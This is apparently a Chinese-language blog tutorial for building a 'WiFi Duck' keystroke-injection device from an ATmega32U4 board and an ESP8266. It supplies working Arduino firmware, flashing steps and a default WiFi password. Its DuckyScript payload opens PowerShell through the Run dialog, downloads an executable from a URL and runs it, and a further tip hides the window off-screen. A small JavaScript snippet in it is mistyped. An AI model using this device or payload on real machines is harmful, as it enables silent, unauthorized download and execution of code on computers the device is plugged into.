wifi duck

参考地址

所需材料

    1.CJMCU-Beetle Leonardo USB ATMEGA32U4
    2.ESP8266-12F
    3.AMS1117-3.3V电源模块

所需软件

    ARDUINO IDE 下载地址：https://www.arduino.cc/en/Main/Software
    NodeMCU Flasher 下载地址：https://github.com/nodemcu/nodemcu-flasher

操作步骤

1.ino

int program_pin = 12;
int enable_pin = 13;
void setup() {
    Serial1.begin(115200);
    Serial.begin(115200);
    pinMode(enable_pin, OUTPUT);
    pinMode(program_pin, OUTPUT);
    digitalWrite(program_pin, LOW);
    digitalWrite(enable_pin, HIGH);
}
void loop() {
    while (Serial1.available()) {
        Serial.write((uint8_t) Serial1.read());
    }
    if (Serial.available()) {
        while (Serial.available()) {
            Serial1.write((uint8_t) Serial.read());
        }
    }
}

2.ino

#include <Keyboard.h>
#define BAUD_RATE 57200

#define ExternSerial Serial1

String bufferStr = "";
String last = "";

int defaultDelay = 0;

void Line(String _line)
{
  int firstSpace = _line.indexOf(" ");
  if (firstSpace == -1) Press(_line);
  else if (_line.substring(0, firstSpace) == "STRING") {
    for (int i = firstSpace + 1; i < _line.length(); i++) Keyboard.write(_line[i]);
  }
  else if (_line.substring(0, firstSpace) == "DELAY") {
    int delaytime = _line.substring(firstSpace + 1).toInt();
    delay(delaytime);
  }
  else if (_line.substring(0, firstSpace) == "DEFAULTDELAY") defaultDelay = _line.substring(firstSpace + 1).toInt();
  else if (_line.substring(0, firstSpace) == "REM") {} //nothing :/
  else if (_line.substring(0, firstSpace) == "REPLAY") {
    int replaynum = _line.substring(firstSpace + 1).toInt();
    while (replaynum)
    {
      Line(last);
      --replaynum;
    }
  } else {
    String remain = _line;

    while (remain.length() > 0) {
      int latest_space = remain.indexOf(" ");
      if (latest_space == -1) {
        Press(remain);
        remain = "";
      }
      else {
        Press(remain.substring(0, latest_space));
        remain = remain.substring(latest_space + 1);
      }
      delay(5);
    }
  }

  Keyboard.releaseAll();
  delay(defaultDelay);
}


void Press(String b) {
  if (b.length() == 1) Keyboard.press(char(b[0]));
  else if (b.equals("ENTER")) Keyboard.press(KEY_RETURN);
  else if (b.equals("CTRL")) Keyboard.press(KEY_LEFT_CTRL);
  else if (b.equals("SHIFT")) Keyboard.press(KEY_LEFT_SHIFT);
  else if (b.equals("ALT")) Keyboard.press(KEY_LEFT_ALT);
  else if (b.equals("GUI")) Keyboard.press(KEY_LEFT_GUI);
  else if (b.equals("UP") || b.equals("UPARROW")) Keyboard.press(KEY_UP_ARROW);
  else if (b.equals("DOWN") || b.equals("DOWNARROW")) Keyboard.press(KEY_DOWN_ARROW);
  else if (b.equals("LEFT") || b.equals("LEFTARROW")) Keyboard.press(KEY_LEFT_ARROW);
  else if (b.equals("RIGHT") || b.equals("RIGHTARROW")) Keyboard.press(KEY_RIGHT_ARROW);
  else if (b.equals("DELETE")) Keyboard.press(KEY_DELETE);
  else if (b.equals("PAGEUP")) Keyboard.press(KEY_PAGE_UP);
  else if (b.equals("PAGEDOWN")) Keyboard.press(KEY_PAGE_DOWN);
  else if (b.equals("HOME")) Keyboard.press(KEY_HOME);
  else if (b.equals("ESC")) Keyboard.press(KEY_ESC);
  else if (b.equals("BACKSPACE")) Keyboard.press(KEY_BACKSPACE);
  else if (b.equals("INSERT")) Keyboard.press(KEY_INSERT);
  else if (b.equals("TAB")) Keyboard.press(KEY_TAB);
  else if (b.equals("END")) Keyboard.press(KEY_END);
  else if (b.equals("CAPSLOCK")) Keyboard.press(KEY_CAPS_LOCK);
  else if (b.equals("F1")) Keyboard.press(KEY_F1);
  else if (b.equals("F2")) Keyboard.press(KEY_F2);
  else if (b.equals("F3")) Keyboard.press(KEY_F3);
  else if (b.equals("F4")) Keyboard.press(KEY_F4);
  else if (b.equals("F5")) Keyboard.press(KEY_F5);
  else if (b.equals("F6")) Keyboard.press(KEY_F6);
  else if (b.equals("F7")) Keyboard.press(KEY_F7);
  else if (b.equals("F8")) Keyboard.press(KEY_F8);
  else if (b.equals("F9")) Keyboard.press(KEY_F9);
  else if (b.equals("F10")) Keyboard.press(KEY_F10);
  else if (b.equals("F11")) Keyboard.press(KEY_F11);
  else if (b.equals("F12")) Keyboard.press(KEY_F12);
  else if (b.equals("SPACE")) Keyboard.press(' ');
  //else Serial.println("not found :'"+b+"'("+String(b.length())+")");
}

void setup() {

  Serial.begin(BAUD_RATE);
  ExternSerial.begin(BAUD_RATE);

  pinMode(13, OUTPUT);
  digitalWrite(13, HIGH);

  Keyboard.begin();
}

void loop() {
  if (ExternSerial.available()) {
    bufferStr = ExternSerial.readStringUntil("END");
    Serial.println(bufferStr);
  }

  if (bufferStr.length() > 0) {

    bufferStr.replace("\r", "\n");
    bufferStr.replace("\n\n", "\n");

    while (bufferStr.length() > 0) {
      int latest_return = bufferStr.indexOf("\n");
      if (latest_return == -1) {
        Serial.println("run: " + bufferStr);
        Line(bufferStr);
        bufferStr = "";
      } else {
        Serial.println("run: '" + bufferStr.substring(0, latest_return) + "'");
        Line(bufferStr.substring(0, latest_return));
        last = bufferStr.substring(0, latest_return);
        bufferStr = bufferStr.substring(latest_return + 1);
      }
    }

    bufferStr = "";
    ExternSerial.write(0x99);
    Serial.println("done");
  }
}

esp8266_wifi_duck_4mb.bin下载

其实很简单，如电路图连接起来

装环境，找对端口，把1.ino上传，接着设备会重启，

再选择端口，把bin用NodeMCU Flasher刷进去，

断开设备，用电烙铁焊断红框中的那条线，再把设备插上去，

再用Arduino上传2.ino，过一会就可以看到 WIFI Duck,密码quackquack,

管理IP和WIFI KILL一样是192.168.4.1，里面有DUCK Script 的语法介绍（没写全不过够用）

DELAY 500
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 500
STRING (new-object System.net.WebClient).DownloadFile('https://dl.360safe.com/360/inst.exe',$env:TMP%2b'\a.exe')
DELAY 500
ENTER
DELAY 5000
STRING cd $env:TMP
DELAY 500
ENTER
STRING ./a
DELAY 500
ENTER
DELAY 1000
LEFT
DELAY 500
ENTER

执行代码，powershell下载360管理员权限运行，

ALT+SPACE M LEFTARROW REPLAY100 也可以这样把窗口隐藏

这个版本的BIN有BUG加减和一些符号不能打，我看了下前后端的源码，

只要在view.htm下面的script加个正则过滤下就好了，

document.getElementById(“scriptTextArea”).value.replase(/+?/g, ‘%2b’);

如果懒得话可以直接URL编码失效的字符就可以，

翻不了墙的可以在这下

链接：https://pan.baidu.com/s/1MIrYe9C3YnM72LaA-J2Gvw 密码：vjqj